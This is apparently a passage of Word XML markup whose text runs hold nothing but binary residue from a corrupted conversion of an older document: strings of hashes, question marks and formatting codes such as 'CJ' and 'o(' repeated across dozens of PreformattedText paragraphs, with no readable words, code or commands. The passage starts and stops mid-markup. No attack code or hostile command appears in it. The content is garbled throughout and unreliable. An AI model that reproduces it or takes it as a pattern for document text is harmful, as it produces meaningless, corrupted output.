        <w:t>#h?\##CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(###j#####h?###CJ##U####j?####h?\###h?\##CJ##U## #j</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??R</w:t>
        <w:br/>
        <w:t>###h?\##CJ##KH##U##V##o(#(d&amp;##h&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?&amp;##?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T'##?'##?'##?(##?(##?(##?(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,####?x#G$#H$#a$##</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$#H$#####$##?7##dp?###?P#1$#^?7#a$#gd?\###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###??##dh###WD?#`??#gd?\######$##?7##dp?###?P#1$#^?7#a$#gd?\####?&amp;###'##</w:t>
        <w:br/>
        <w:t>'##$'##('##6'##F'##P'##^'##f'##h'##?'##?'##?'##?'##?'##?'##?'##?'##?'##?'##?'##?'##?'##?'##?'##?'##?'##?'##?'##</w:t>
        <w:br/>
        <w:t>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(###(###(###(##"(##$(##((##*(##L(##N(##P(##R(##T(##V(##Z(##f(##h(##j(##l(##n(##?(##?(##?(##?(##???????????????????????????????????????????????###########j#####h?###CJ##U####h?k?#6#?&gt;*#CJ##o(###h?k?##h?k?#6#?&gt;*#CJ##o(###h?k?##h?###6#?&gt;*#CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###6#?CJ####h?###6#?CJ##o(####h?k?##h?###&gt;*#CJ####h?k?#&gt;*#CJ##o(##</w:t>
        <w:br/>
        <w:t>#h?###CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?k?#CJ##o(###h?k?##h?k?#&gt;*#CJ##o(#7?(##?(##?(##?(##?(##?(##?(##?(##?(##?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2)##4)##R)##T)##V)##r)##?)##?)##?)##?)##?)##?)##?)###*###*###*## *##:*##J*##d*##f*##h*##?*##?*##?*##?*##?*##?*##?*##?*##?*##?*##?*###+###+##0+##2+##4+##N+##???????????????????????????}??}????}??}????}??###hn#n#CJ##OJ##QJ##^J##aJ#####hn#n#CJ##aJ##o(###hn#n##hn#n#aJ##o(###hn#n#CJ##OJ##QJ##^J##aJ###</w:t>
        <w:tab/>
        <w:t>#hn#n#o(#</w:t>
        <w:tab/>
        <w:t>#h?###o(###h?###CJ##PJ##o(###h?k?#6#?CJ##o(####h?###6#?CJ##o(##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(###j#####h?###CJ##U####j#####h?k?##h?k?#CJ##U## #j#??R</w:t>
        <w:br/>
        <w:t>###h?k?#CJ##KH##U##V##o(#1?(##?(##?(##?(###)###)##</w:t>
        <w:br/>
        <w:t>)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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?@##d,####?x#G$#H$#^?@###</w:t>
        <w:br/>
        <w:t>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)##4)##6)##T)##V)##N############B############6############B############6############B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?##kd#####$##$#If#####T###?l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##?r##??=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8#? ?#?#################?#?#################?#?#################?#?#################?#?################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#?####?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###?T####V)##r)##t)##v)##?)##?############?############?############3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?##kd?####$##$#If#####T###?l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##?r##??=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8#? ?#?#################?#?#################?#?#################?#?#################?#?################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#?####?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###?T######$##$#G$#H$#If####a$#gd1L?###?)##?)##?)##?)##?)##?)##?)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H$#If####a$#gd1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?###?)##?)##?)###*###*###*## *##N############B############6############B############6############B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?##kdl$###$##$#If#####T###?l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##?r##??=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8#? ?#?#################?#?#################?#?#################?#?#################?#?################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#?####?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###?T#### *##:*##&lt;*##&gt;*##J*##?############?############?############3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?##kd#%###$##$#If#####T###?l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##?r##??=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8#? ?#?#################?#?#################?#?#################?#?#################?#?################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#?####?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###?T######$##$#G$#H$#If####a$#gd1L?###J*##f*##h*##?*##?*##?*##?*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H$#If####a$#gd1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?###?*##?*##?*##?*##?*##?*##?*##N############B############6############B############6############B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?##kd?%###$##$#If#####T###?l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##?r##??=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8#? ?#?#################?#?#################?#?#################?#?#################?#?################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#?####?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###?T####?*###+###+##</w:t>
        <w:br/>
        <w:t>+###+##?############?############?############3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?##kdj&amp;###$##$#If#####T###?l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##?r##??=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8#? ?#?#################?#?#################?#?#################?#?#################?#?################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#?####?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###?T######$##$#G$#H$#If####a$#gd1L?####+##2+##4+##P+##R+##n+##p+##r+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G$#H$#If####a$#gd1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1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f?###N+##P+##R+##V+##\+##^+##l+##n+##t+##?+##?+##?+##?+##?+###,###,###,## ,##",##&amp;,##(,##,,##.,##0,##4,##6,##8,##&lt;,##&gt;,##@,##D,##F,##H,##L,##N,##P,##R,##V,##X,##d,##f,##p,##r,##|,##~,##?????????????????????????????????????{r{r{r######h#]F##hn#n#aJ###</w:t>
        <w:br/>
        <w:t>#hn#n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]F##hn#n####hn#n#5#?aJ##o(####h#]F##hn#n#5#?aJ##o(####h#]F##hn#n#5#?aJ##</w:t>
        <w:br/>
        <w:t>#hn#n#CJ###</w:t>
        <w:br/>
        <w:t>#h?###CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#hn#n#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(#$#h?k?##hn#n#@?##CJ##OJ##QJ##^J##aJ#####h?k?##hn#n#@?##CJ##aJ##o(###hn#n#@?##CJ##aJ##o(#</w:t>
        <w:tab/>
        <w:t>#hn#n#o(###hn#n#CJ##OJ##QJ##^J##aJ##,r+##t+##v+##?+##?+##?+###,##N############D############D############D############D############7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,####?x#G$#H$#gdn#n##</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$#H$##?##kd#'###$##$#If#####T###?l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##?r##??=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8#? ?#?#################?#?#################?#?#################?#?#################?#?################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#?####?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###?T#####,##",##(,##0,##8,##@,##H,##P,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h####$#If####a$#gd1L?#</w:t>
        <w:tab/>
        <w:t>###$#If####gd1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1L?###P,##R,##X,##*#############################################$##dh####$#If####a$#gd1L?#?##kd?'###$##$#If#####?l##?##########################??##?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 ##R#################?#?#################?#?#################?#?#################?#?#################?#?#################</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6##?####?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?4?#######4?###</w:t>
        <w:br/>
        <w:t>#l# ?########/?#######?####a?###yt1L?###X,##f,##r,##~,##?,##?,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h####$#If####a$#gd1L?###~,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,###-###-###-###-## -##"-##$-##*-##,-##8-##:-##B-##D-##R-##T-##b-##d-##n-##p-##r-##x-##z-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##,.##..##&gt;.##P.##v.##?.##?.##?.##?.##?.##?.##?.##?????????????????????????????????????????????????????????????????###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#hm#?#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#hn#n#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?###CJ#####h#]F##hn#n#5#?aJ##o(####h#]F##hn#n#5#?aJ####hn#n#5#?aJ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]F##hn#n####h#]F##hn#n#aJ###</w:t>
        <w:br/>
        <w:t>#hn#n#aJ##E?,##?,##?,##?,##?,##8############)############)############)##########################$##dh####$#If####a$#gd1L?#?##kd?(###$##$#If#####?l##?##########################?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 ##R###################?###################?###################?###################?###################?#################</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6##?####?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###yt1L?###?,##?,##?,##?,##?,##?############?############?############)######################?##kd?)###$##$#If#####?l##?##########################?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 ##R###################?###################?###################?###################?###################?#################</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6##?####?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###yt1L?#####$##dh####$#If####a$#gd1L?###?,##?,##?,##?,###-###-##"-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h####$#If####a$#gd1L?###"-##$-##,-##:-##D-##8############)############)############)##########################$##dh####$#If####a$#gd1L?#?##kd?*###$##$#If#####?l##?##########################?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 ##R###################?###################?###################?###################?###################?#################</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6##?####?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###yt1L?###D-##T-##d-##p-##r-##?############?############?############)######################?##kdb+###$##$#If#####?l##?##########################?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 ##R###################?###################?###################?###################?###################?#################</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6##?####?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###yt1L?#####$##dh####$#If####a$#gd1L?###r-##z-##?-##?-##?-##?-##?-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h####$#If####a$#gd1L?###?-##?-##..##v.##?.##8############+############+############+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,####?x#G$#H$#gdn#n#?##kd?,###$##$#If#####?l##?##########################?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 ##R###################?###################?###################?###################?###################?#################</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6##?####?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###yt1L?###?.##?.##?.##?/##J0##?1##P3##?3##?3###4##</w:t>
        <w:br/>
        <w:t>4###4##&amp;4##&lt;4##F4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</w:t>
        <w:br/>
        <w:t>###$##dh###a$#gd?G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,####?x#G$#H$#gd?#?##</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$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,####?x#G$#H$#a$###?.##?.##L/##?/##?/##?/##J0##T0##?0##B1##V1##X1##v1##x1##?1##?1##?1##?1##?1##?1##?1##?1##?1##82##P3##?3##?3##?3###4##&amp;4##:4##X4##\4##^4##t4##v4##?4##?4##?4##?4##?4##?4##?4##?4##?4##?4##?4##?4##?4##?4##?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5##$5##(5##65##85##&lt;5##@5##J5##N5##R5##T5##????????????????????????????????????????????</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>嫟</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>???######hn#n##hn#n#&gt;*#CJ##o(####hn#n##h?###&gt;*#CJ####hn#n##h?###o(#</w:t>
        <w:tab/>
        <w:t>#hn#n#o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(#</w:t>
        <w:tab/>
        <w:t>#h?###o(###h?###CJH#PJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h#Q?#CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?###CJ###</w:t>
        <w:br/>
        <w:t>#h?#?#CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#hn#n#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?#?#CJ##o(##&gt;F4##H4##L4##X4##^4##v4##?4##O############C############C############C############C############C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?##kd#-###$##$#If#####?l##4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##?r##???#?#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">##? ?#K#################?#?#################?#U#################?# </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>################?#?################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#?####?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###f4###?4##?4##?4##?4##?4##?4##?4##O############C############C############C############C############C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?##kd#.###$##$#If#####?l##4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##?r##???#?#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">##? ?#K#################?#?#################?#U#################?# </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>################?#?################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#?####?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###f4###?4##?4##?4##?4##?4###5##&amp;5##O############C############C############C############C############C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?##kd?.###$##$#If#####?l##4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##?r##???#?#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">##? ?#K#################?#?#################?#U#################?# </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>################?#?################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#?####?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###f4###&amp;5##(5##*5##25##?5##?5##46##O############E############E############E############E############E#############################################</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$#H$##?##kd?/###$##$#If#####?l##4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##?r##???#?#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">##? ?#K#################?#?#################?#U#################?# </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>################?#?################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#?####?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?#?####?###?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###f4###T5##V5##`5##d5##j5##l5##p5##z5##~5##?5##?5##?5##?5##?5##?5##?5##?5##?5##?5##?5##?5##?5##?5##?5##?5##?5##?5##?5##?5##?5###6###6###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6###6##.6##26##D6##H6##V6##`6##b6##z6##~6##?6##?6##?6##?6##?6##?6##?6##?6##?6##?6##?6##?6##?6###7##,7##.7##07##47##????????????????????????????????????</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>糩</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>??????????????????????######h-+=##h?Wr#CJ##o(###h?i=##h?Wr#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?Wr#CJ##o(###h?#?#&gt;*#CJ##o(##$#h?#?##h?#?#CJ##eh####o(#r?####?#####</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?#?#CJ##o(###hn#n##h?###&gt;*#CJ##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?###CJ#####hn#n##hn#n#&gt;*#CJ##o(#&gt;47##87##H7##`7##b7##v7##z7##?7##?7##?7##?7##?7##?7##?7##?7##?7##?7##?7##?7##?7##?7##?7##?7##?7##?7##?7##?7##?7##?7##?7##?7###8###8##</w:t>
        <w:br/>
        <w:t>8###8###8###8###8##&amp;8##.8##88##&gt;8##B8##F8##N8##R8##h8##j8##l8##?8##?8##?8##?8##?8##?8##?8##?8##?8##?8###9###9##??????????ù????????????????????????????????ù????????????##h?U?##h?Wr#o(###h-+=##h?Wr#o(###h?i=##h?Wr#o(#</w:t>
        <w:tab/>
        <w:t>#h?Wr#o(###h?######h?Wr##h?###&gt;*#CJ####h?Wr##h?Wr#&gt;*#CJ##o(####h?Wr#&gt;*#CJ##o(##</w:t>
        <w:br/>
        <w:t>#h?###CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(###h?i=##h?Wr#CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?Wr#CJ##o(###h?i=##h?Wr#CJ##o(##&lt;46##b7##r7##?7###8##n8##?8##d9##t9##?9##D:##?:##?:##x;##?;##?;##V&lt;##?&lt;##?&lt;##b=##?=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</w:t>
        <w:br/>
        <w:t>###$##dh###a$#gd?2?######??##?###dh###WD##^??#`?##gd1L?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##</w:t>
        <w:br/>
        <w:t>&amp;##F</w:t>
        <w:tab/>
        <w:t>##dh###WD##gdg#?##</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$#H$#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##</w:t>
        <w:br/>
        <w:t>&amp;##F</w:t>
        <w:tab/>
        <w:t>##dh###WD##gd?Wr####9##$9##*9##29##:9##B9##H9##`9##b9##d9##x9##|9##?9##?9##?9##?9##?9##?9##?9##?9##?9##?9##?9##?9##?9##?9##?9##?9##?9##?9##?9###:###:##":##&amp;:##B:##L:##T:##\:##d:##n:##t:##x:##~:##?:##?:##?:##?:##?:##?:##?:##?:##?:##?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#;###;###;## ;##&amp;;##.;##6;##@;##F;##b;##t;##v;##x;##?;##???????????????????????????????????????????????????????????????</w:t>
        <w:br/>
        <w:t>#h1L?#CJ#####h?i=##h1L?#CJ##o(###h?o'##h1L?#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h1L?#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?Wr#CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?###CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(###h?###CJ##PJ##o(###h?i=##h?Wr#o(#</w:t>
        <w:tab/>
        <w:t>#h?Wr#o(###h?U?##h?Wr#o(##D?;##?;##?;##?;##?;##?;##?;##?;##?;##?;##?;##?;##?;##?;##?;##?;##?;##?;##?;###&lt;##</w:t>
        <w:br/>
        <w:t>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#&lt;###&lt;## &lt;##*&lt;##.&lt;##T&lt;##^&lt;##d&lt;##p&lt;##x&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;##?&lt;###=##</w:t>
        <w:br/>
        <w:t>=###=###=## =##(=##`=##b=##r=##v=##?=##?=##?=##?=##?=##?=##?????????????????????????????????????????????????????????####</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#hJQ%#CJ##o(###j#####hJQ%#U##mH##nH##u###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?#r#CJ##o(###h?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>f##h?#r#CJ##o(###h&amp;,###h&amp;,##CJ##OJ##PJ##aJ##o(###h?2?##h?###o(###h?###CJ##PJ##o(###h?Q?##h1L?#CJ##o(#</w:t>
        <w:br/>
        <w:t>#h1L?#CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h1L?#CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?###CJ##:?=##?=###&gt;##&gt;&gt;##Z&gt;##|&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;###?##x?##??##??##??##??##??###@##?############?############?############?############?############?############?############?############?############?############?############?############?############?############?############?############?############?###########################??##?x##d,####?x#VD?#WD2#^??#`?x#gd?T?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>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,####?x#gd?0n##</w:t>
        <w:tab/>
        <w:t>###d,####?x#gdm#?##</w:t>
        <w:tab/>
        <w:t>###d,####?x#gdCW?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>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,####?x#gdCW?##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###??##d,####?x#^??#gd&amp;,##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
